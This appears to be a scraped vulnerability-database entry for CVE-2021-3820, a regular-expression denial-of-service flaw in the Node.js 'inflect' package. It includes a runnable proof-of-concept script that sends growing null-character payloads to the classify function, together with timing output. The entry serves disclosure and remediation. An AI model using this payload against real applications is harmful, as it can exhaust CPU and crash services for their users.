Lucene search
Ready-research4612B31A-072B-4F61-A916-C7E4CBC2042AHistorySep 19, 2021 - 10:44 a.m.
Inefficient Regular Expression Complexity in pksunkara/inflect
2021-09-1910:44:30
ready-research
www.huntr.dev
11
regular expression
denial of service
cpu consumption
crafted input
node.js
exhausting resources
system crash
EPSS
0.001
Percentile
45.7%
✍️ Description
The inflect package is vulnerable to ReDoS (regular expression denial of service). An attacker that is able to provide a crafted table_name as input to the classify function may cause an application to consume an excessive amount of CPU.
Below pinned line using vulnerable regex.
🕵️♂️ Proof of Concept
Put the below in a poc.js file and run with node
//poc.js
var inflect = require('i')();
for(var i = 1; i <= 500; i++) {
var time = Date.now();
var payload = ""+"\u0000".repeat(i*10000)+"\u0000"
inflect.classify(payload)
var time_cost = Date.now() - time;
console.log("Classify time : " + payload.length + ": " + time_cost+" ms");
}
Check the Output:
Classify time : 10001: 158 ms
Classify time : 20001: 565 ms
Classify time : 30001: 1282 ms
Classify time : 40001: 2129 ms
Classify time : 50001: 3369 ms
Classify time : 60001: 8430 ms
Classify time : 70001: 15926 ms
Classify time : 80001: 16221 ms
--
--
💥 Impact
This vulnerability is capable of exhausting system resources and leads to crashes.
Related
osv
osv
CVE-2021-3820
2021-09-27 13:15:07
inflect vulnerable to Inefficient Regular Expression Complexity
2021-09-29 17:12:19
cvelist
cvelist
CVE-2021-3820 Inefficient Regular Expression Complexity in pksunkara/inflect
2021-09-27 12:25:26
cve
cve
CVE-2021-3820
2021-09-27 13:15:07
nvd
nvd
CVE-2021-3820
2021-09-27 13:15:07
prion
prion
Design/Logic Flaw
2021-09-27 13:15:00
veracode
veracode
Regular Expression Denial Of Service (ReDoS)
2021-09-28 07:38:04
github
github
inflect vulnerable to Inefficient Regular Expression Complexity
2021-09-29 17:12:19
nessus
nessus
Debian DLA-2843-1 : linux - LTS security update
2021-12-17 00:00:00
